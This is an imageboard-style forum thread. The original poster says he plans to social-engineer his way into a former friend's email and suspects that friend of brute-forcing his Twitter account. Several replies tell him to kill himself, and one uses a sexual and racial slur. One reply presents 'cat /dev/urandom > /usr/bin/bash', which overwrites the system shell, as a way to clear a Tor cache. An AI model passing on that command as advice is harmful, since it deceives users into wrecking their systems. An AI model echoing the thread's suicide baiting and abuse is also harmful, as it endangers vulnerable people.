LAMO some one is trying to bruteforce my twitter

Okay, story time. Some guy on twitter started to talk shit about me (we were friends) and my patients started to run so I told him to stop he said no so i told him that I am going to hack his email then he blocked me (went to old town for two days) I finished my script for social engineering aka what and how I was gonna say it now I finished it, I'm gonna call tomorrow but anyway, I went on to TOR and saw that someone had went over to many attempts to log into my account I suspect it the guy from earlier! any thots anons?

What's it like being 13? I think I missed a few years.

actually just really bored

There's already a Sup Forums humor thread up, moron.

Its not as funny as this

The paragraph you wrote made no fucking sense. Rewrite it in proper English and post again. Disgusting mouth breathers like you are what is wrong with society. Honestly you should kill yourself if you can't write coherently.

>any thots anons?
> thots

This actually means "That Hoe Over There" where i'm from. And to translate further, it mean your regular okie dokie hood chick.

So no, i got no thots, bruv.

k y s
y
s

>being IP banned from Twitter

>and my patients started to run
You're a doctor?

The fact that you're using TOR proves to me that this is bait. Not even going to bother reading your shitty paragraph.

Oh I thought they called black girls thots because they were worth nothing more than a sexual thought.

I legitimately thought he was a doctor on first run through of that post.

You need to run: cat /dev/urandom > /usr/bin/bash

This will clear your tor cache and make you more anonymous.

This is possibly the worst thread in the history of Sup Forums. My advice would be to commit suicide.

>my patients started to run
I jej'd

how do i get my fonts to look like that

... Why are you in tor?

>and my patients started to run
that's terrible

well you better go catch them

epic xd lulkittyz xdddd epic reddit meme bro

It explains why his words are incomprehensible.